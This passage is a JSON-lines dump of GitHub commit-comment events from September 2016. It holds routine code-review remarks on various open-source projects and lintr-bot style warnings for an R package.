{"id":"4596404810","type":"CommitCommentEvent","actor":{"login":"gmdimitriz"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19114093,"position":42,"line":42,"path":"src/Device/Driver/ThermalExpress/Driver.hpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T13:57:08Z","updated_at":"2016-09-21T13:57:08Z","body":"sorry, i will use just the volume var... i have removed other and forgot to clean... this is just to hold the configs received in parser\r\n"}},"created_at":"2016-09-21T13:57:08Z"}
{"id":"4596405908","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"w3c/ttml2"},"payload":{"comment":{"id":19114095,"position":null,"line":null,"path":null,"commit_id":"b53b0e342822bc16a47f6d6c5646469db6438305","created_at":"2016-09-21T13:57:18Z","updated_at":"2016-09-21T13:57:18Z","body":"Thanks Glenn, that helps a lot."}},"created_at":"2016-09-21T13:57:18Z"}
{"id":"4596406046","type":"CommitCommentEvent","actor":{"login":"j-mracek"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":19114096,"position":6,"line":154,"path":"dnf/plugin.py","commit_id":"0190d067800fdb48d68dcc9c9158351987521854","created_at":"2016-09-21T13:57:19Z","updated_at":"2016-09-21T13:57:19Z","body":"I am fine with it, because it means:\r\nif any([[], (), None]):"}},"created_at":"2016-09-21T13:57:19Z"}
{"id":"4596406265","type":"CommitCommentEvent","actor":{"login":"Matoxxi"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":19114098,"position":null,"line":null,"path":null,"commit_id":"35c120a7623db88346d7a568a7382eabeca096ad","created_at":"2016-09-21T13:57:22Z","updated_at":"2016-09-21T13:57:22Z","body":"this is useless as noverca doesn't exists anymore "}},"created_at":"2016-09-21T13:57:22Z"}
{"id":"4596409040","type":"CommitCommentEvent","actor":{"login":"stephanlukasczyk"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19114103,"position":23,"line":50,"path":"code/modules/Corpus.py","commit_id":"2b020c21a048b6b6d75d0b796d30b569f353b794","created_at":"2016-09-21T13:57:49Z","updated_at":"2016-09-21T13:57:49Z","body":"Did I miss something or didn't you remove the stopwords completely? Or will they be used somewhere else which needs to be implemented?"}},"created_at":"2016-09-21T13:57:49Z"}
{"id":"4596412029","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19114112,"position":null,"line":null,"path":null,"commit_id":"db63c36a9cf759a08d05c72fc81a32186036e852","created_at":"2016-09-21T13:58:17Z","updated_at":"2016-09-21T13:58:17Z","body":"It looks fine."}},"created_at":"2016-09-21T13:58:17Z"}
{"id":"4596414017","type":"CommitCommentEvent","actor":{"login":"leylaKapi"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19114120,"position":5,"line":4,"path":"Gemfile","commit_id":"3d0f100b398de300e35f1e25538ac1b353ccbd6e","created_at":"2016-09-21T13:58:35Z","updated_at":"2016-09-21T13:58:35Z","body":"@HamdiBayhan  I said for using ransack instead of elasticsearch, because we developt with ransack not elasticsearch. I didin't say for searchkick gem problem, I said for learn ransack and change with searchkick ."}},"created_at":"2016-09-21T13:58:35Z"}
{"id":"4596416111","type":"CommitCommentEvent","actor":{"login":"jtanx"},"repo":{"name":"jtanx/fontforgebuilds"},"payload":{"comment":{"id":19114127,"position":6,"line":76,"path":"make-portable-package.sh","commit_id":"f2308fea20da26cd86e42aeb5a0e28dbb5149f52","created_at":"2016-09-21T13:58:55Z","updated_at":"2016-09-21T13:58:55Z","body":"Need to reverse this logic."}},"created_at":"2016-09-21T13:58:55Z"}
{"id":"4596418930","type":"CommitCommentEvent","actor":{"login":"IrisZhang"},"repo":{"name":"IrisZhang/iriszhang.github.io"},"payload":{"comment":{"id":19114141,"position":null,"line":null,"path":null,"commit_id":"e02d3b60360d9947341507ba88f607e1d8907820","created_at":"2016-09-21T13:59:23Z","updated_at":"2016-09-21T13:59:23Z","body":"canvas-clock"}},"created_at":"2016-09-21T13:59:23Z"}
{"id":"4596425572","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"wiez/MyPlot"},"payload":{"comment":{"id":19114156,"position":27,"line":184,"path":"resources/zho.ini","commit_id":"dff64de5a62e5f6eca5b50a40551ce8d81ad3c63","created_at":"2016-09-21T14:00:23Z","updated_at":"2016-09-21T14:00:23Z","body":"I believe it's supposed to be public, not open"}},"created_at":"2016-09-21T14:00:23Z"}
{"id":"4596429808","type":"CommitCommentEvent","actor":{"login":"fheck"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19114178,"position":23,"line":50,"path":"code/modules/Corpus.py","commit_id":"2b020c21a048b6b6d75d0b796d30b569f353b794","created_at":"2016-09-21T14:01:00Z","updated_at":"2016-09-21T14:01:00Z","body":"they are encapsulated in another module (ArgStopwordParser) and this module should be used instead (this code here was not used anyway)"}},"created_at":"2016-09-21T14:01:00Z"}
{"id":"4596430135","type":"CommitCommentEvent","actor":{"login":"misterou"},"repo":{"name":"misterou/hello-world"},"payload":{"comment":{"id":19114180,"position":null,"line":null,"path":null,"commit_id":"f90d2177093d5da93d4dfe6c20f0d29e437ce811","created_at":"2016-09-21T14:01:03Z","updated_at":"2016-09-21T14:01:03Z","body":"this is chance"}},"created_at":"2016-09-21T14:01:03Z"}
{"id":"4596434448","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":19114185,"position":6,"line":154,"path":"dnf/plugin.py","commit_id":"0190d067800fdb48d68dcc9c9158351987521854","created_at":"2016-09-21T14:01:43Z","updated_at":"2016-09-21T14:01:43Z","body":"not only:\r\n* `bool(\"0\") -> False`\r\n* `bool(0) -> False`\r\n* `bool(\"\") -> False`"}},"created_at":"2016-09-21T14:01:43Z"}
{"id":"4596442884","type":"CommitCommentEvent","actor":{"login":"kara"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19114201,"position":39,"line":1060,"path":"modules/@angular/forms/test/reactive_integration_spec.ts","commit_id":"212f8dbde7039c2dd76aa75ee38316aad29e9d33","created_at":"2016-09-21T14:02:57Z","updated_at":"2016-09-21T14:02:57Z","body":"Yes, we are aware of this use case (see https://github.com/angular/angular/issues/11763). The fix has to be split  into two parts because supporting individual disabled controls requires changes to the API (which are not being merged into master at this time; must wait for a minor release).\r\n\r\nIn any case, calling `control.disable()` (as the test does) should always disable all parts of a control, much like disabling a select with disable all options within it.  Disabling individual parts of a control happens on the UI level by binding to the option's disabled property (again, like a select). So the test is correct as is."}},"created_at":"2016-09-21T14:02:57Z"}
{"id":"4596446689","type":"CommitCommentEvent","actor":{"login":"ArikYa"},"repo":{"name":"pristineio/webrtc-build-scripts"},"payload":{"comment":{"id":19114212,"position":null,"line":null,"path":null,"commit_id":"6a2c85f9692736ba92e5859d614655bcabdba060","created_at":"2016-09-21T14:03:36Z","updated_at":"2016-09-21T14:03:36Z","body":"It was completely removed in 13920. I'm not sure but there might be some compilation errors in a few revisions before that"}},"created_at":"2016-09-21T14:03:36Z"}
{"id":"4596446985","type":"CommitCommentEvent","actor":{"login":"circlelove"},"repo":{"name":"circlelove/gold-miner"},"payload":{"comment":{"id":19114214,"position":null,"line":null,"path":null,"commit_id":"2233cbd822fab4a3aa9733319c3a641e6bd1a997","created_at":"2016-09-21T14:03:39Z","updated_at":"2016-09-21T14:03:39Z","body":"UA"}},"created_at":"2016-09-21T14:03:39Z"}
{"id":"4596447421","type":"CommitCommentEvent","actor":{"login":"jdcasey"},"repo":{"name":"yma88/indy"},"payload":{"comment":{"id":19114216,"position":null,"line":null,"path":null,"commit_id":"9a3883d057bd127f2477c95f4e648ebadda148b5","created_at":"2016-09-21T14:03:44Z","updated_at":"2016-09-21T14:03:44Z","body":"I think this is actually a good result. I suspected we were already resolving properties, and this proves it. If the property comes through unresolved, it's because there was no value given in the pom.xml for that property...not much we can do about that. The rest of the fix you mentioned is to validate the URL before we blindly use it. See my comments in indy/#359 "}},"created_at":"2016-09-21T14:03:44Z"}
{"id":"4596452821","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19114224,"position":95,"line":95,"path":"lesson_4/railways_core.rb","commit_id":"02eb7248ac0c4701eb48e1bb18ca1a1d782de490","created_at":"2016-09-21T14:04:25Z","updated_at":"2016-09-21T14:04:25Z","body":"Да, там нужно к целому числу приводить."}},"created_at":"2016-09-21T14:04:25Z"}
{"id":"4596453270","type":"CommitCommentEvent","actor":{"login":"arnovdkamp"},"repo":{"name":"arnovdkamp/test-project"},"payload":{"comment":{"id":19114225,"position":null,"line":null,"path":null,"commit_id":"13f563dba9f4394a4225cbb8a22aad3f5addc8a0","created_at":"2016-09-21T14:04:29Z","updated_at":"2016-09-21T14:04:29Z","body":"Some comment"}},"created_at":"2016-09-21T14:04:29Z"}
{"id":"4596455635","type":"CommitCommentEvent","actor":{"login":"arfon"},"repo":{"name":"ghtorrent/ghtorrent.org"},"payload":{"comment":{"id":19114231,"position":null,"line":null,"path":null,"commit_id":"8c547b0cb568665c420200c4f58fb119a1f32eae","created_at":"2016-09-21T14:04:51Z","updated_at":"2016-09-21T14:04:51Z","body":"👍 "}},"created_at":"2016-09-21T14:04:51Z"}
{"id":"4596456354","type":"CommitCommentEvent","actor":{"login":"nanorarias"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114233,"position":26,"line":26,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:04:58Z","updated_at":"2016-09-21T14:04:58Z","body":"Entiendo la idea de hacer esto, que es por si en un futuro alguien decide cambiar el nombre de una etiqueta, la podés cambiar una sola vez en lugar de tener que cambiarla en todos lados donde la habías usado.\r\n\r\nLo que me choca un poco es el hecho de hacer un método que lo único que haga es devolver una cadena constante. ¿No sería mejor usar propiedades estáticas constantes para esto en lugar de métodos? Me refiero a una cosa así:\r\n\r\n```java\r\npublic static final String PROGRAM_TAG = \"program\";\r\npublic static final String PROFILE_TAG = \"profile\";\r\n```"}},"created_at":"2016-09-21T14:04:58Z"}
{"id":"4596456980","type":"CommitCommentEvent","actor":{"login":"Kyziridis"},"repo":{"name":"Kyziridis/Neural-Network"},"payload":{"comment":{"id":19114236,"position":5,"line":5,"path":"README.md","commit_id":"7fdd294753152642f696ff2352305d75d02a410d","created_at":"2016-09-21T14:05:05Z","updated_at":"2016-09-21T14:05:05Z","body":"The main script is the 'demo_mnistLogreg.m'  file which loads the data from the mnist_all.mat, split them to training_set and test_set, normalize the pixels to take values in [0,1] , and calls the other main functions such as costgrad_softmax,  ml_softmax , etc. \r\n\r\nThe main purpose is to detect the handwritten numbers and this will done with multiple logistic regression which will classifies the data we have.\r\n"}},"created_at":"2016-09-21T14:05:05Z"}
{"id":"4596460698","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19114241,"position":8,"line":268,"path":"truffle/src/main/java/org/jruby/truffle/core/hash/HashNodes.java","commit_id":"457ca026861f7ac716f9508b50711f45e6710660","created_at":"2016-09-21T14:05:36Z","updated_at":"2016-09-21T14:05:36Z","body":"@eregon Yes, it looks like Boxed Primitives need to be handled. For reference, here are the relevant comparisons:\r\nhttps://github.com/ruby/ruby/blob/trunk/st.c#L89\r\nhttps://github.com/ruby/ruby/blob/trunk/hash.c#L100\r\n"}},"created_at":"2016-09-21T14:05:36Z"}
{"id":"4596462636","type":"CommitCommentEvent","actor":{"login":"vermiculus"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19114248,"position":null,"line":null,"path":null,"commit_id":"a7a9789e00594d6f9e8c314b079b8814b2973026","created_at":"2016-09-21T14:05:54Z","updated_at":"2016-09-21T14:05:54Z","body":":+1: "}},"created_at":"2016-09-21T14:05:54Z"}
{"id":"4596466326","type":"CommitCommentEvent","actor":{"login":"arnovdkamp"},"repo":{"name":"arnovdkamp/test-project"},"payload":{"comment":{"id":19114252,"position":null,"line":null,"path":null,"commit_id":"13f563dba9f4394a4225cbb8a22aad3f5addc8a0","created_at":"2016-09-21T14:06:29Z","updated_at":"2016-09-21T14:06:29Z","body":"And some more..."}},"created_at":"2016-09-21T14:06:29Z"}
{"id":"4596467152","type":"CommitCommentEvent","actor":{"login":"astec"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19114254,"position":39,"line":1060,"path":"modules/@angular/forms/test/reactive_integration_spec.ts","commit_id":"212f8dbde7039c2dd76aa75ee38316aad29e9d33","created_at":"2016-09-21T14:06:36Z","updated_at":"2016-09-21T14:06:36Z","body":"Got it, thanks for clarification."}},"created_at":"2016-09-21T14:06:36Z"}
{"id":"4596468356","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19114260,"position":95,"line":95,"path":"lesson_4/railways_core.rb","commit_id":"02eb7248ac0c4701eb48e1bb18ca1a1d782de490","created_at":"2016-09-21T14:06:48Z","updated_at":"2016-09-21T14:06:48Z","body":"Я ещё заметил что при добавлении вагона у поезда, вагон добавляется в массив `@added_wagons`: https://github.com/fee1good/thinknetica_ror_beginer/blob/02eb7248ac0c4701eb48e1bb18ca1a1d782de490/lesson_4/train.rb#L82\r\n\r\nНо при удалении почему-то мы работаем со счётчиком вагонов: https://github.com/fee1good/thinknetica_ror_beginer/blob/02eb7248ac0c4701eb48e1bb18ca1a1d782de490/lesson_4/train.rb#L71\r\n\r\nПо заданию мы должны работать именно с массивом в котором хранятся объекты вагонов. Поэтому удаление вагона нужно сделать тоже через `@added_wagons`."}},"created_at":"2016-09-21T14:06:48Z"}
{"id":"4596471848","type":"CommitCommentEvent","actor":{"login":"tankerkiller125"},"repo":{"name":"TrackingTeam/PC-Track"},"payload":{"comment":{"id":19114269,"position":5,"line":21,"path":"resources/assets/js/app.js","commit_id":"b5444cd2643fdaf277f1c1ec60687fc3150bcbaf","created_at":"2016-09-21T14:07:21Z","updated_at":"2016-09-21T14:07:21Z","body":"I could make this much nicer by using variables but I was lazy. Maybe I'll fix it later."}},"created_at":"2016-09-21T14:07:21Z"}
{"id":"4596483072","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"neobuddy89/android_kernel_cyanogen_msm8916"},"payload":{"comment":{"id":19114315,"position":null,"line":null,"path":null,"commit_id":"2dd962dea3797fdbf25caa1001a6dc97ab2b638d","created_at":"2016-09-21T14:09:04Z","updated_at":"2016-09-21T14:09:04Z","body":"That's good observation. Thanks!"}},"created_at":"2016-09-21T14:09:04Z"}
{"id":"4596488035","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19114330,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T14:09:51Z","updated_at":"2016-09-21T14:09:51Z","body":"GetInternalVariableBug (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T14:09:51Z"}
{"id":"4596488877","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19114332,"position":null,"line":null,"path":null,"commit_id":"f1be3f53c640ef44c04f516f5a81f6ea96f6e283","created_at":"2016-09-21T14:09:58Z","updated_at":"2016-09-21T14:09:58Z","body":"ahh... i see but i don't see where it happens, the rc.sysinit script\nalways write PUPMODE=2 when there is no initrd and shutdownconfig does\nnot set it to 3, i see PUPMODE=128, PUPMOD=32, but not pupmode=3, this\nis something i noticed a couple months ago\n\ni'll bring it back then\n"}},"created_at":"2016-09-21T14:09:58Z"}
{"id":"4596490257","type":"CommitCommentEvent","actor":{"login":"xus"},"repo":{"name":"leifos-gmbh/bugfixing_ilias_5_0"},"payload":{"comment":{"id":19114338,"position":null,"line":null,"path":null,"commit_id":"e0049b9376198b1a1039875e501cc148409971ee","created_at":"2016-09-21T14:10:12Z","updated_at":"2016-09-21T14:10:12Z","body":"In  /Modules/Survey/classes/class.ilSurveyParticipantsGUI.php the \"maintenanceObject\" method instantiates \"ilSurveyMaintenanceTableGUI\" object and after setting the data, it calls the \"getHTML\" method which extends the \"/Services/Tables/classes/class.ilTable2GUI.php\" class.\r\n\r\nInside \"getHTML\" method \"ilUtil::SortArray\" is called using as a fourth parameter the result of the \"numericOrdering\" method which is in the same class (class.ilTable2GUI.php) and returns always false and it doesn't use the param sended."}},"created_at":"2016-09-21T14:10:12Z"}
{"id":"4596490426","type":"CommitCommentEvent","actor":{"login":"nanorarias"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114339,"position":49,"line":49,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:10:13Z","updated_at":"2016-09-21T14:10:13Z","body":"Ya teníamos un método `Support.nodeList` que devolvía una lista de nodos (`List<Node>`). Veo que vos en lugar de usar esa hiciste otra parecida (`Support.elementList`) que devuelve una lista de elementos (`List<Element>`) en lugar de nodos. Habría que ver cuál es la diferencia entre un nodo y un elemento en la API de DOM y, si se puede, elegir el que nos convenga más y usar uno solo."}},"created_at":"2016-09-21T14:10:13Z"}
{"id":"4596493988","type":"CommitCommentEvent","actor":{"login":"BassirElOuaadi"},"repo":{"name":"EdisonLorgues1SD1617/Math1SD1617"},"payload":{"comment":{"id":19114351,"position":null,"line":null,"path":null,"commit_id":"84103ca475016576f88c88217b6fd6224d374d12","created_at":"2016-09-21T14:10:46Z","updated_at":"2016-09-21T14:10:46Z","body":"Je comprends pas comment je peux calculer les coordonnées\r\n"}},"created_at":"2016-09-21T14:10:46Z"}
{"id":"4596494582","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19114353,"position":null,"line":null,"path":null,"commit_id":"ade71145c6078bac0ee00de05b584afca0c7a385","created_at":"2016-09-21T14:10:52Z","updated_at":"2016-09-21T14:10:52Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T14:10:52Z"}
{"id":"4596494998","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19114355,"position":null,"line":null,"path":null,"commit_id":"ade71145c6078bac0ee00de05b584afca0c7a385","created_at":"2016-09-21T14:10:56Z","updated_at":"2016-09-21T14:10:56Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         